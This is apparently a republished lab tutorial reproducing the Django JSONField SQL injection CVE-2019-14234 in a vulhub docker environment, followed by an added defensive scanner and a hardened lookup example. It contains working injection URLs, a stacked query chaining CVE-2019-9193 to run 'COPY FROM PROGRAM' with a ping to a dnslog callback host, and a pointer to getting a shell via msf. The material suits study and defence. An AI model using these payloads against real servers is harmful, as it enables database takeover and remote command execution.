2025-04-01 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains in detail how to reproduce the Django JSONField SQL injection vulnerability CVE-2019-14234. The content is shared here as a reference; after reading it you should have a working understanding of the vulnerability.
0x00 Introduction
Django is a popular open source web framework written in Python, and many websites and apps are built on it. Django follows the MTV pattern: model (M), view (V) and template (T). With Django, programmers can quickly create high-quality, maintainable, database-driven applications, and a large ecosystem of third-party plug-ins gives the framework strong extensibility.
0x01 Vulnerability overview
The vulnerability requires that the developer uses JSONField/HStoreField and that the user can control the key name in a queryset lookup; the SQL is injected through that key name.
Django is usually paired with a PostgreSQL database, and JSONField maps to that database's JSON type. The root cause lies in the implementation of the JSONField class in Django. The essential job of a Django model is to generate SQL statements, but when Django generated SQL for a JSONField key lookup it did so by plain string concatenation.
The JSONField class hands a key lookup to the KeyTransform class, and that is where the SQL fragment is generated.
Here key_name is an attacker-controllable string, and the resulting statement has the shape WHERE (field->'[key_name]') = 'value', so SQL injection is possible.
0x02 Affected versions
Django
1.11.x before 1.11.23
2.1.x before 2.1.11
2.2.x before 2.2.4
0x03 Environment setup
Build it yourself:
Use vulhub's docker environment directly:
git clone https://github.com/vulhub/vulhub.git
cd vulhub/django/CVE-2019-14234/
docker-compose up -d
If http://ip:8000 can be accessed normally, the environment has been built successfully.
0x04 Vulnerability exploitation
From the code analysis we know that if a Django application uses JSONField and the "key name" of the query is user-controllable, SQL injection is possible.
Visit http://ip:8000/admin
Enter the user name admin, password a123123123
Then visit
http://ip:8000/admin/vuln/collection/
Then construct a URL that performs a query:
http://ip:8000/admin/vuln/collection/?detail__a%27b=123
The injection has succeeded, and the error page shows the SQL statement that was constructed.
To further verify the injection, we construct
http://ip:8000/admin/vuln/collection/?detail__title')='1' or 1=1--
The key part of the SQL statement generated in the background is
WHERE ("vuln_collection"."detail" -> 'title') = '1' or 1=1 --') = %s
Since "or 1=1" is always true, all rows should be returned, and the page returns them as expected, as shown in the following figure.
In the next step, combined with CVE-2019-9193, we try to inject a command. The URL is constructed as follows:
http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1%3bcreate table cmd_exec (cmd_output text)--%20
Although the page reports an error, the reason is "no results to fetch", which indicates that our statement was executed.
Then use dnslog to check whether the command was executed:
http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1%3bcopy cmd_exec FROM PROGRAM 'ping c2pn4v.dnslog.cn'--%20
The DNS traffic was received successfully.
The PostgreSQL docker container in this reproduction environment has no external port mapping. If the port is exposed, or in a real environment, msf can also be combined with CVE-2019-9193 to obtain a shell.
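For defenders, the root cause described in 0x01 and the admin changelist requests used above suggest two practical checks. The following example is added here and is not part of the original article or of Django itself: it shows the hardened form of the key lookup (key name passed as a bound parameter, illustrative rather than Django's actual code) and a small scanner that flags admin requests whose JSONField key segment is not a plain identifier, run over constructed access-log lines (the log format and IP addresses are assumptions).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# A JSONField key name is only safe when it is a plain identifier; the vulnerable
# KeyTransform spliced it unquoted into WHERE ("table"."field" -> 'key_name').
SAFE_KEY = re.compile(r"^[A-Za-z0-9_]+$")
LOG_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample access-log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2019:10:00:01 +0000] "GET /admin/vuln/collection/?detail__title=hello HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jun/2019:10:00:09 +0000] "GET /admin/vuln/collection/?detail__a%27b=123 HTTP/1.1" 500 1024',
    '10.0.0.5 - - [01/Jun/2019:10:00:15 +0000] "GET /admin/vuln/collection/?detail__title%27%29%3D%271%27%20or%201%3D1--%20 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jun/2019:10:01:00 +0000] "GET /static/admin/css/base.css HTTP/1.1" 200 16000',
]

def key_lookup_sql(field_sql, key_name):
    """Hardened form (illustrative, not Django's own code): the key name travels
    as a bound parameter instead of being concatenated into the SQL text."""
    return "(%s -> %%s)" % field_sql, [key_name]

def unsafe_json_key_lookups(query_string):
    """Parameter names whose key segment (after the first '__') is not a plain
    identifier, i.e. would have been spliced into SQL by a vulnerable Django."""
    hits = []
    for name, _value in parse_qsl(query_string, keep_blank_values=True):
        if "__" in name and not SAFE_KEY.match(name.split("__", 1)[1]):
            hits.append(name)
    return hits

def scan_access_log(lines):
    """(path, suspicious params, status) for admin requests carrying such a lookup.
    A 500 often means the injected text broke the query; a 200 still merits review."""
    findings = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path.startswith("/admin/"):
            hits = unsafe_json_key_lookups(url.query)
            if hits:
                findings.append((url.path, hits, int(m.group("status"))))
    return findings
```

Running scan_access_log(SAMPLE_LOG) flags the second and third lines and ignores the benign lookup and the static-file request.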
That is how the Django JSONField SQL injection vulnerability CVE-2019-14234 is reproduced. I hope the above content is of some help to you; if you think the article is good, please share it so that more people can see it.